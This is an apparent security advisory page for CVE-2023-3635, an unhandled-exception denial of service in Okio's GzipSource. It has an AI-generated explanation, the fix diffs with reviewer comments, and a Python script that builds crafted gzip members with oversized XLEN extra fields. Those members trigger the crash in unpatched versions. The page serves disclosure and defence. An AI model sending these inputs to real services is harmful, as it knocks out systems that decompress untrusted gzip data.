VYPR
Moderate severity · OSV Advisory · Published Jul 12, 2023 · Updated Oct 23, 2024

Okio GzipSource unhandled exception Denial of Service

CVE-2023-3635

Description

GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An unhandled exception in Okio's GzipSource, triggered when a gzip header carries an extra field (FEXTRA) longer than 0x7fff bytes, can cause denial of service.

Vulnerability

The vulnerability resides in Okio's GzipSource class, which does not handle an exception raised while parsing a gzip header. In consumeHeader(), the length of the optional extra field (XLEN, which RFC 1952 defines as an unsigned 2-byte little-endian value) was read with readShortLe(), a signed 16-bit read. Any XLEN above 0x7fff is therefore sign-extended to a negative number, and that negative count is handed to source.require(), whose argument check throws instead of reading the field. GzipSource does not catch the exception, so it propagates out of the read and aborts decompression [2][4].

Exploitation

An attacker exploits this by supplying a GZIP member whose header sets the FEXTRA flag with an XLEN between 0x8000 and 0xffff. Such a member is well-formed under RFC 1952 and other decompressors accept it; only Okio's signed read of the field makes it fail, so a check that the input is a valid gzip stream does not stop it. When an application decompresses the member through GzipSource, the unhandled exception halts processing. No authentication is required; the member can be delivered by any path that feeds gzip data to the vulnerable Okio client, such as file uploads, network streams, or bundled resources [3].
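The following script is an added example, not Okio's code and not part of the advisory; it serves both the Vulnerability and Exploitation paragraphs above. It builds constructed gzip members with large FEXTRA fields, reads XLEN the way the pre-fix code (signed) and the fixed code (unsigned) do, walks the rest of the header in the same order as GzipSource.consumeHeader(), and checks with Python's standard gzip module that the members are well-formed. The function names, the payload, and the use of ValueError to stand in for Okio's precondition failure are this example's own assumptions; the last vector is the one from the project's extraLongXlen test shown in the patches below.

```python
"""Constructed gzip members with oversized FEXTRA fields (CVE-2023-3635 model).

Added example, not Okio's code. It models GzipSource.consumeHeader(): the
pre-fix code read XLEN with readShortLe(), a signed 16-bit read, so any XLEN
above 0x7fff became negative before reaching source.require(); the fix masks
the value with 0xffff (RFC 1952 section 2.3.1 defines XLEN as an unsigned
2-byte little-endian field).
"""
import gzip
import struct
import zlib

# Header flag bits, RFC 1952 section 2.3.1.
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 0x01, 0x02, 0x04, 0x08, 0x10


def build_gzip_member(payload: bytes, extra: bytes, with_hcrc: bool = False) -> bytes:
    """Return a well-formed gzip member whose header carries `extra` as FEXTRA.

    Neither Okio nor Python's gzip module validates the subfield structure
    inside the extra field; both only skip XLEN bytes, so any content works.
    """
    if len(extra) > 0xFFFF:
        raise ValueError("XLEN is a 16-bit field")
    flags = FEXTRA | (FHCRC if with_hcrc else 0)
    # ID1 ID2 CM=8 FLG MTIME=0 XFL=0 OS=255 (unknown), then XLEN + extra bytes.
    header = struct.pack("<BBBBIBB", 0x1F, 0x8B, 8, flags, 0, 0, 255)
    header += struct.pack("<H", len(extra)) + extra
    if with_hcrc:  # CRC16 = low 16 bits of the CRC32 over the header so far
        header += struct.pack("<H", zlib.crc32(header) & 0xFFFF)
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, no zlib wrapper
    body = comp.compress(payload) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(payload) & 0xFFFFFFFF, len(payload) & 0xFFFFFFFF)
    return header + body + trailer


def read_xlen(member: bytes, fixed: bool) -> int:
    """Read XLEN at offset 10 as Okio did before (signed) or after (unsigned) the fix."""
    return struct.unpack_from("<H" if fixed else "<h", member, 10)[0]


def consume_header(member: bytes, fixed: bool) -> int:
    """Walk the header like GzipSource.consumeHeader() and return the DEFLATE offset.

    fixed=False reproduces the pre-fix behaviour: the sign-extended XLEN reaches
    the byte-count check as a negative number and is rejected. ValueError is this
    example's stand-in for the unchecked exception Okio raised at that point.
    """
    if member[:2] != b"\x1f\x8b" or member[2] != 8:
        raise ValueError("not a gzip member")
    flags = member[3]
    pos = 10
    if flags & FEXTRA:
        xlen = read_xlen(member, fixed)
        pos += 2
        if xlen < 0:
            raise ValueError(f"byteCount < 0: {xlen}")
        pos += xlen  # skip the extra field (Okio: source.skip(xlen))
    if flags & FNAME:
        pos = member.index(b"\x00", pos) + 1
    if flags & FCOMMENT:
        pos = member.index(b"\x00", pos) + 1
    if flags & FHCRC:
        stored = struct.unpack_from("<H", member, pos)[0]
        if stored != zlib.crc32(member[:pos]) & 0xFFFF:
            raise ValueError("FHCRC mismatch")
        pos += 2
    return pos


def header_outcome(member: bytes, fixed: bool) -> str:
    """'ok:<deflate offset>' if the header parses, else 'error:<message>'."""
    try:
        return f"ok:{consume_header(member, fixed)}"
    except ValueError as exc:
        return f"error:{exc}"


def stdlib_decompress(member: bytes) -> bytes:
    """Decompress with Python's gzip module, which reads XLEN as unsigned."""
    return gzip.decompress(member)


# The vector from Okio's extraLongXlen test: flags 0x04 (FEXTRA), XLEN 0xffff,
# 65535 zero bytes, then the DEFLATE stream and trailer for "Hi!".
OKIO_TEST_VECTOR = (
    bytes.fromhex("1f8b0804000000000000")
    + b"\xff\xff" + bytes(0xFFFF)
    + bytes.fromhex("f3c8540400dac59e7903000000")
)

if __name__ == "__main__":
    for xlen in (0x7FFF, 0x8000, 0xFFFF):  # last value accepted, first rejected, maximum
        member = build_gzip_member(b"Hi!", b"A" * xlen)
        assert stdlib_decompress(member) == b"Hi!"  # well-formed per RFC 1952
        print(f"xlen=0x{xlen:04x} signed={read_xlen(member, False):6d} "
              f"pre-fix={header_outcome(member, False)} fixed={header_outcome(member, True)}")
    print("okio vector:", stdlib_decompress(OKIO_TEST_VECTOR), header_outcome(OKIO_TEST_VECTOR, False))
```

Running it shows the boundary directly: 0x7fff parses under both reads, while 0x8000 and 0xffff are decompressed by the standard library yet are rejected by the signed model with a negative byte count. Because a 64 KiB extra field is all the attacker needs, the members are small enough to send inline in a request or bundle in a resource.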

Impact

Successful exploitation results in a denial of service: the read that reaches the oversized extra field throws, and unless the caller catches the exception the thread, request, or process performing the decompression terminates abnormally. Any service that relies on Okio's GzipSource to decompress untrusted GZIP data is affected, and an attacker who can resubmit such input can keep the service failing [3].

Mitigation

The issue is fixed in Okio 3.4.0 (and in 1.17.6 for the 1.x line), where the XLEN field is masked with 0xffff so that it is treated as the unsigned value the gzip specification defines [4]. Users should update to a patched version. Until then, applications should treat GzipSource reads of untrusted data as fallible: catch exceptions at the decompression boundary so a single bad stream fails only that request rather than the process, and bound the amount of data accepted from any one source [2][3].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                      Ecosystem   Affected versions         Patched versions
com.squareup.okio:okio       Maven       >= 2.0.0-RC1, < 3.4.0     3.4.0
com.squareup.okio:okio       Maven       < 1.17.6                  1.17.6
com.squareup.okio:okio-jvm   Maven       >= 2.0.0-RC1, < 3.4.0     3.4.0

Affected products (1)

  • Range: 2.2.2, 2.4.1, okio-parent-0.5.0, …

Patches (2)

b4fa875dc249

Fix a bug where xlen larger than 0x7fff was rejected (#1334)

https://github.com/square/okio · Martin Stefanko · Oct 1, 2023 · via ghsa
2 files changed · +16 −2
  • okio/src/main/java/okio/GzipSource.java+1 1 modified
    @@ -127,7 +127,7 @@ private void consumeHeader() throws IOException {
         if (((flags >> FEXTRA) & 1) == 1) {
           source.require(2);
           if (fhcrc) updateCrc(source.buffer(), 0, 2);
    -      int xlen = source.buffer().readShortLe();
    +      int xlen = source.buffer().readShortLe() & 0xffff;
           source.require(xlen);
           if (fhcrc) updateCrc(source.buffer(), 0, xlen);
           source.skip(xlen);
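Review bot: the `& 0xffff` on the `+` line needs a comment explaining why it is there, since on its own it reads as an odd idiom. RFC 1952 defines XLEN as an unsigned 2-byte little-endian field, and without the mask readShortLe() sign-extends any value above 0x7fff, so `source.require(xlen)` two lines down receives a negative count; that is the rejection the commit message describes. Something like `// XLEN is unsigned; readShortLe() sign-extends` on the changed line would keep the next reader from "simplifying" it away. Worth grepping for other 16-bit lengths read with readShortLe() while here.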
    
  • okio/src/test/java/okio/GzipSourceTest.java+15 1 modified
    @@ -15,9 +15,11 @@
      */
     package okio;
     
    +import org.junit.Test;
    +
    +import java.io.ByteArrayOutputStream;
     import java.io.IOException;
     import java.util.zip.CRC32;
    -import org.junit.Test;
     
     import static okio.Util.UTF_8;
     import static org.junit.Assert.assertEquals;
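Review bot: `import java.io.ByteArrayOutputStream;` is added here but nothing in this patch uses it; the only other hunk in the file adds extraLongXlen, which uses Buffer and ByteString only, and the file compiled without the import before. Drop it, and leave `import org.junit.Test;` where it was so the diff for a security fix does not carry an unrelated import reorder.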
    @@ -182,6 +184,18 @@ private void assertGzipped(Buffer gzipped) throws IOException {
         }
       }
     
    +  @Test public void extraLongXlen() throws Exception {
    +    int xlen = 0xffff;
    +    Buffer gzippedSource = new Buffer()
    +        .write(gzipHeaderWithFlags((byte) 0x04));
    +    gzippedSource.writeShort((short) xlen);
    +    gzippedSource.write(new byte[xlen]);
    +    gzippedSource.write(ByteString.decodeHex("f3c8540400dac59e7903000000"));
    +
    +    Buffer gunzipped = gunzip(gzippedSource);
    +    assertEquals("Hi!", gunzipped.readUtf8());
    +  }
    +
       private ByteString gzipHeaderWithFlags(byte flags) {
         byte[] result = gzipHeader.toByteArray();
         result[3] = flags;
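Review bot: `gzippedSource.writeShort((short) xlen)` writes the length big-endian while GzipSource reads it with readShortLe(); the test only passes because 0xffff is the same in either byte order. Use `writeShortLe(xlen)` so the vector is a valid RFC 1952 header, and add a case at xlen = 0x8000 (bytes 00 80 little-endian), the smallest value the old signed read turned negative and one where a big-endian write would actually break the test. A variant with FHCRC set (flags 0x06) would also exercise `updateCrc(source.buffer(), 0, xlen)` over the large field, which this test leaves uncovered.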
    
81bce1a30af2

Fix a bug where xlen larger than 0x7fff was rejected (#1280)

https://github.com/square/okio · Jesse Wilson · Jun 22, 2023 · via ghsa
2 files changed · +19 −5
  • okio/src/jvmMain/kotlin/okio/GzipSource.kt+1 1 modified
    @@ -117,7 +117,7 @@ class GzipSource(source: Source) : Source {
         if (flags.getBit(FEXTRA)) {
           source.require(2)
           if (fhcrc) updateCrc(source.buffer, 0, 2)
    -      val xlen = source.buffer.readShortLe().toLong()
    +      val xlen = (source.buffer.readShortLe().toInt() and 0xffff).toLong()
           source.require(xlen)
           if (fhcrc) updateCrc(source.buffer, 0, xlen)
           source.skip(xlen)
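Review bot: `(source.buffer.readShortLe().toInt() and 0xffff).toLong()` is correct but opaque; readShortLe() returns a Short, `.toInt()` sign-extends it, and the mask undoes that, which is the whole fix. Either add a comment pointing at RFC 1952's unsigned XLEN or write it as `readShortLe().toUShort().toLong()`, which says the same thing without the magic constant. Whichever form is kept, a short comment on this line is what will stop someone from removing the mask as redundant later.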
    
  • okio/src/jvmTest/kotlin/okio/GzipKotlinTest.kt+18 4 modified
    @@ -23,14 +23,28 @@ import org.junit.Test
     class GzipKotlinTest {
       @Test fun sink() {
         val data = Buffer()
    -    val gzip = (data as Sink).gzip()
    -    gzip.buffer().writeUtf8("Hi!").close()
    +    (data as Sink).gzip().buffer().use { gzip ->
    +      gzip.writeUtf8("Hi!")
    +    }
         assertEquals("1f8b0800000000000000f3c8540400dac59e7903000000", data.readByteString().hex())
       }
     
       @Test fun source() {
         val buffer = Buffer().write("1f8b0800000000000000f3c8540400dac59e7903000000".decodeHex())
    -    val gzip = (buffer as Source).gzip()
    -    assertEquals("Hi!", gzip.buffer().readUtf8())
    +    (buffer as Source).gzip().buffer().use { gzip ->
    +      assertEquals("Hi!", gzip.readUtf8())
    +    }
    +  }
    +
    +  @Test fun extraLongXlen() {
    +    val xlen = 0xffff
    +    val buffer = Buffer()
    +      .write("1f8b0804000000000000".decodeHex())
    +      .writeShort(xlen)
    +      .write(ByteArray(xlen))
    +      .write("f3c8540400dac59e7903000000".decodeHex())
    +    (buffer as Source).gzip().buffer().use { gzip ->
    +      assertEquals("Hi!", gzip.readUtf8())
    +    }
       }
     }
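Review bot: the rewrite of sink() and source() to `use { }` is unrelated cleanup that makes up most of this test hunk; split it out so the CVE fix stays a minimal, cherry-pickable commit. In extraLongXlen, `.writeShort(xlen)` is big-endian while the parser reads little-endian and only agrees because 0xffff is byte-order symmetric; use `writeShortLe(xlen)` and add an xlen = 0x8000 case, the value where the sign first flips and where byte order would matter.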
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (9)

News mentions (0)

No linked articles in our index yet.